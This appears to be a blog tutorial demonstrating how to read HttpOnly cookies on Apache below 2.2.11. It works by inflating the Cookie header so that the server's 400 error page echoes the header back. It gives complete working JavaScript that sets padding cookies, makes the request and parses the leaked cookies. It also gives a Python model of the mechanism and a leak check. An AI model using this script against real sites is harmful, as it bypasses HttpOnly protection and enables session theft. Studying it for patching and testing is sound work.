Tag archive: httponly

A method for obtaining HttpOnly cookies (limited to Apache versions below 2.2.11)

First, create a page named test.php that sets two cookie values. The code is as follows:

<?php
setcookie("open", 1, time()+3600, "", "", 0);     // ordinary cookie
setcookie("private", 1, time()+3600, "", "", 0, 1);  // set as an HttpOnly cookie
?>

Next I inserted the JS code alert(document.cookie); into the test.php page to see whether both cookie values could be read. The result was open=1

Our goal now is to obtain the HttpOnly cookie. Create a file named ajax.js with the following code (the JS code comes from https://gist.github.com/pilate/1955a1c28324d4724b7b/):

// Most browsers limit cookies to 4k characters, so we need multiple
function setCookies (good) {
    // Construct string for cookie value
    var str = "";
    for (var i=0; i< 819; i++) {
        str += "x";
    }
    // Set cookies
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss"+i+"="+str+";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();

    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content
            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
            // match() returns null when there is no <pre> block, so guard before indexing
            if (content && content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i=0; i<cookies.length; i++) {
                    var s_c = cookies[i].split('=',2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "test.php", true);  // request the test.php file in the current directory
    xhr.send(null);
}

makeRequest();

Then modify the test.php file as follows:

<?php
setcookie("open",1,time()+3600,"","",0);
setcookie("private",1,time()+3600,"","",0,1);
 
?>
 
<script src="ajax.js"></script>
 
<body onload="makeRequest();">

Now simply visit test.php and you obtain
open=1;private=1
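To make the mechanism concrete from the server side, here is an added example in Python (not code from this post or from the gist): it models why the padding cookies push the Cookie header over Apache's default LimitRequestFieldSize of 8190 bytes, what an unpatched 2.2 error page echoes back compared with a generic error document, and a check for whether an error body reflects real cookie names. The HTML of the error page is constructed to resemble Apache's, not captured from a live server.

```python
import re
from typing import Optional

# Apache's default LimitRequestFieldSize: a single request header line
# longer than this is rejected with 400 Bad Request.
LIMIT_REQUEST_FIELD_SIZE = 8190

def build_cookie_header(real: dict, padding_count: int, padding_len: int) -> str:
    """Cookie header the browser sends: the site's cookies (HttpOnly ones
    included, the browser attaches them regardless) plus the padding cookies
    ajax.js sets (xss0..xss9, each padding_len bytes of 'x')."""
    parts = [f"{k}={v}" for k, v in real.items()]
    parts += ["xss%d=%s" % (i, "x" * padding_len) for i in range(padding_count)]
    return "; ".join(parts)

def apache_400_body(cookie_header: str, echo_header: bool) -> Optional[str]:
    """Constructed model of the server's reaction; returns None when the header
    fits the limit and the request is served normally. echo_header=True mimics
    the unpatched 2.2 page that quotes the offending header inside <pre>;
    False models a generic ErrorDocument 400 that quotes nothing."""
    if len("Cookie: " + cookie_header) <= LIMIT_REQUEST_FIELD_SIZE:
        return None
    body = ("<html><head><title>400 Bad Request</title></head><body>\n"
            "<h1>Bad Request</h1>\n<p>Your browser sent a request that this "
            "server could not understand.<br />\n"
            "Size of a request header field exceeds server limit.<br />\n")
    if echo_header:
        body += "<pre>\nCookie: " + cookie_header + "\n</pre>\n"
    return body + "</body></html>\n"

def leaked_cookie_names(body: Optional[str]) -> set:
    """Cookie names a page script could recover from the error body, minus the
    xssN padding cookies it set itself. An empty set means nothing leaked."""
    if body is None:
        return set()
    m = re.search(r"<pre>\s*Cookie:\s*(.+?)\s*</pre>", body, re.S)
    if not m:
        return set()
    names = set()
    for part in m.group(1).split(";"):
        name = part.strip().partition("=")[0]
        if name and not re.fullmatch(r"xss\d+", name):
            names.add(name)
    return names

if __name__ == "__main__":
    site = {"open": "1", "private": "1"}   # private is the HttpOnly one
    header = build_cookie_header(site, padding_count=10, padding_len=819)
    print("echoing 400 page leaks:", leaked_cookie_names(apache_400_body(header, True)))
    print("generic 400 page leaks:", leaked_cookie_names(apache_400_body(header, False)))
```

Without the padding the header stays under the limit and no error page is produced at all, which is why the script has to inflate the header before the HttpOnly value can be read back.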